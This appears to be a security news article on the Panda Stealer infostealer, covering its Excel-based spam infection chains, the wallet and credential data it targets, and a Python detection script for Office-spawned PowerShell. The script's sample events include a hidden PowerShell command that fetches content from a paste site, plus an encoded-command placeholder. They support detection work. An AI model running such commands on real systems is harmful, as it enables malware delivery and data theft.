Security researchers recently observed a new information stealer (infostealer) malware. Called Panda Stealer, the malware is distributed via spam emails mostly in the US, Australia, Japan, and Germany. Trend Micro’s research shows that Panda Stealer is also utilizing fileless techniques to bypass detection mechanisms.
Panda Stealer’s infection chains
In terms of the campaign’s spam approaches, the malware operators are using luring business quote requests to trick their potential victims into executing malicious Excel files. The researchers have identified two infection chains:
- The first one is an .XLSM attachment containing macros that download a loader, which in turn downloads and executes Panda Stealer;
- The second one is an attached .XLS file containing an Excel formula that runs a PowerShell command; that command retrieves content from paste.ee, a Pastebin alternative, which in turn accesses a second, encrypted PowerShell command.
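The second chain boils down to a pattern a defender can look for in endpoint telemetry: an Office process spawning PowerShell whose command line references a paste site or carries an encoded command. The following is an added detection example written for this article, not code from Trend Micro or the original report; it runs over constructed Sysmon-style process-creation records (field names ParentImage, Image, CommandLine are assumed), and the sample command lines are invented placeholders, not real indicators.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# Events 0 and 1 model the Excel -> PowerShell chain described above;
# event 2 is a benign PowerShell launch from the desktop shell.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -Command "Invoke-WebRequest https://paste.ee/r/EXAMPLE"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoP -EncodedCommand UExBQ0VIT0xERVI="},  # placeholder blob
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
PASTE_SITES = re.compile(r"paste\.ee|pastebin\.com", re.IGNORECASE)
# -e, -ec, -enc and -EncodedCommand are PowerShell's accepted spellings of the flag
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.IGNORECASE)


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons this event matches the chain, or [] if it does not."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in POWERSHELL:
        reasons.append(f"office-spawned-powershell:{parent}")
        if PASTE_SITES.search(cmd):
            reasons.append("paste-site-in-cmdline")
        if ENCODED_FLAG.search(cmd):
            reasons.append("encoded-powershell")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that matched at least one rule."""
    hits = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if r]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

Office spawning PowerShell alone is worth an alert in most environments; the paste-site and encoded-command reasons raise the confidence that it is this kind of chain rather than an admin macro.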
What kind of information is Panda Stealer after?
The malware is interested in data related to victims’ cryptocurrency wallets, including Dash, Bytecoin, Litecoin, and Ethereum:
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, it can steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards, the report says.
It is noteworthy that Panda Stealer shares similarities with another malware known as Collector Stealer and DC Stealer (which has been cracked). Collector Stealer has been offered for sale on an underground forum and on Telegram for $12. Advertised as a top-end information stealer, the threat has a Russian interface. Although similar in many ways, the two stealers use different command-and-control URLs and execution folders. However, both pieces of malware exfiltrate details such as cookies, login data, and web data from victims, storing the collected details in a SQLite3 database.
Another noteworthy discovery is that Panda Stealer shares its fileless distribution approach with another malware family: it has borrowed this feature from the so-called Fair variant of Phobos ransomware. Once the host is infected, the malware runs in memory rather than storing its files on the hard drive.
In January 2021, security researchers discovered ElectroRAT – a “wide-ranging operation targeting cryptocurrency users” on all major operating systems (Windows, macOS, and Linux).
The malicious operation was quite elaborate in its mechanism, consisting of a marketing campaign, custom applications related to cryptocurrencies, and an entirely new Remote Access Tool (RAT).